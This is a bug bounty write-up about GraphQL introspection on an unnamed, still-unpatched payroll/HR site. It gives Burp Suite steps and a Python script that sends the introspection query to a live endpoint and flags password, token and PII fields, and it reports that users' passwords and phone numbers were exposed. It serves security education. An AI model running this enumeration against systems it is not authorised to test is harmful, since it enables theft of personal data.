GraphQL introspection leads to sensitive data disclosure.

Eshan Singh
Oct 30, 2019 · 3 min read
[Image, source: lynda.com]

Introduction

Hello World! I’m Eshan Singh, aka R0X4R. I’m that hacker teenager that your friends told you about. I hack web servers to make systems secure. I’m here to share my recent findings on GraphQL introspection.

What is GraphQL

GraphQL was created at Facebook as a query language for its APIs; it is not a database or a way of storing data. According to GraphQL.org, GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools. That “complete and understandable description of the data” is what introspection exposes: a client can ask the server for its own schema, every type, field and argument, and that is what the rest of this write-up relies on.

About this vulnerability

To discover this bug, I spent at least 5–6 hours learning the fundamentals of GraphQL and read all the other relevant bug reports, especially NahamSec’s GraphQL CTF challenge.

After that, I saw a new program on Bugcrowd, so I participated in it. They gave me a domain [let’s call it example.com, because the vulnerability hasn’t been fixed yet]. So I made an account on that domain, then fired up Burp Suite and added example.com to the spider; after 10–20 seconds I saw example.com/graphql, which gave me the idea that example.com uses GraphQL for its API.

[Image, source: almostdumb.com]

Tools that I used in this

  • Burp Suite
  • Burp Suite extensions: JSON Beautifier and GraphQL Raider
  • A web browser [Firefox] :P

How I got the vulnerability

First I logged out and logged in again on example.com, then went to the ‘Update Profile’ section, changed my name from Eshan Singh to Singh Eshan and clicked save. I intercepted that request and sent it to Repeater, and then I saw something interesting, i.e.


__typename with PayRollAdmin. So I replaced it with xyz, sent the request again and checked the response: xyz was reflected in place of PayRollAdmin.

So, to dig deeper into this, I googled “GraphQL exploits” and found a disclosed HackerOne report, https://hackerone.com/reports/291531. So I thought, let’s try the same thing this guy did in that report.

I googled “introspection GraphQL payloads” and got this from the PayloadsAllTheThings repo:

[Images: the introspection query payload from PayloadsAllTheThings]

Then I copied the payload, pasted it into the GraphQL tab in Burp Suite and sent the request, and voilà! I got a juicy response.
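As an added example (my code, not the author’s, and not the PayloadsAllTheThings payload itself): a small Python client that sends a trimmed form of the standard introspection query, then turns the JSON answer into a list of object types with their field signatures and flags field names that look like PII or secrets. The endpoint, the headers, and the sample response are assumptions constructed for the example; the query is the standard one that ships with graphql-js/GraphiQL (PayloadsAllTheThings reproduces it), cut down to the parts needed here.

```python
import json
import re
import urllib.request

# Trimmed form of the standard introspection query; this subset is enough to
# list every type with its fields and argument names.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      kind name
      fields(includeDeprecated: true) {
        name
        args { name type { ...TypeRef } }
        type { ...TypeRef }
      }
    }
  }
}
fragment TypeRef on __Type {
  kind name ofType { kind name ofType { kind name ofType { kind name } } }
}
"""

# Field names that usually carry PII or secrets; tune this for the target.
SENSITIVE = re.compile(r"password|passwd|secret|token|ssn|salary|phone|receipt", re.I)


def run_introspection(endpoint, headers=None):
    """POST the query to a live endpoint (not exercised offline); pass the session
    cookie or bearer token in headers when the API needs an authenticated user."""
    body = json.dumps({"query": INTROSPECTION_QUERY}).encode()
    req = urllib.request.Request(endpoint, data=body, method="POST",
                                 headers={"Content-Type": "application/json", **(headers or {})})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def type_ref_to_str(ref):
    """Render a (possibly wrapped) __Type reference in SDL style, e.g. '[User!]!'."""
    if ref is None:
        return "?"
    if ref["kind"] == "NON_NULL":
        return type_ref_to_str(ref.get("ofType")) + "!"
    if ref["kind"] == "LIST":
        return "[" + type_ref_to_str(ref.get("ofType")) + "]"
    return ref.get("name") or "?"


def enumerate_schema(introspection):
    """Map each user-defined OBJECT type to its field signatures, 'name(args): Type'."""
    out = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue  # skip scalars/enums and the built-in __Schema, __Type, ... types
        sigs = []
        for f in t.get("fields") or []:
            args = ", ".join(a["name"] + ": " + type_ref_to_str(a["type"]) for a in f.get("args") or [])
            sigs.append(f["name"] + ("(" + args + ")" if args else "") + ": " + type_ref_to_str(f["type"]))
        out[t["name"]] = sigs
    return out


def find_sensitive_fields(fields_by_type):
    """Return 'Type.field' for every field whose name matches SENSITIVE."""
    hits = []
    for tname, sigs in fields_by_type.items():
        for sig in sigs:
            fname = sig.split("(")[0].split(":")[0]
            if SENSITIVE.search(fname):
                hits.append(tname + "." + fname)
    return hits


def _scalar(name, non_null=False):
    # Build a scalar type reference for the constructed sample below.
    ref = {"kind": "SCALAR", "name": name, "ofType": None}
    return {"kind": "NON_NULL", "name": None, "ofType": ref} if non_null else ref


# Constructed sample response (not a real target's schema), shaped the way a
# payroll/HR-style API would answer the query above.
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "user", "args": [{"name": "id", "type": _scalar("ID", True)}],
             "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "receipts", "args": [], "type": {"kind": "LIST", "name": None,
             "ofType": {"kind": "OBJECT", "name": "Receipt", "ofType": None}}},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": _scalar("ID", True)},
            {"name": "phone", "args": [], "type": _scalar("String")},
            {"name": "password", "args": [], "type": _scalar("String")},
        ]},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
    ]}}}

if __name__ == "__main__":
    fields = enumerate_schema(SAMPLE_RESPONSE)
    print(json.dumps(fields, indent=2), find_sensitive_fields(fields))
```

Run as-is it parses the constructed sample; point run_introspection at a real /graphql endpoint, with the session cookie the application issued, to enumerate a live schema. Two caveats worth keeping in mind: introspection only reveals the shape of the API, so the actual disclosure comes from resolvers that hand fields like password and phone to any logged-in user; and switching introspection off hides the schema from a script like this but does not fix those resolvers, since field names can still be guessed or recovered from the client-side JavaScript that already queries them.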


Impact of this

The application is basically used for payroll and HR. So when I exploited it I was able to retrieve receipts of transactions, users’ passwords, phone numbers and more.

Thanks and regards

Eshan Singh [R0X4R]

Signing out…

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew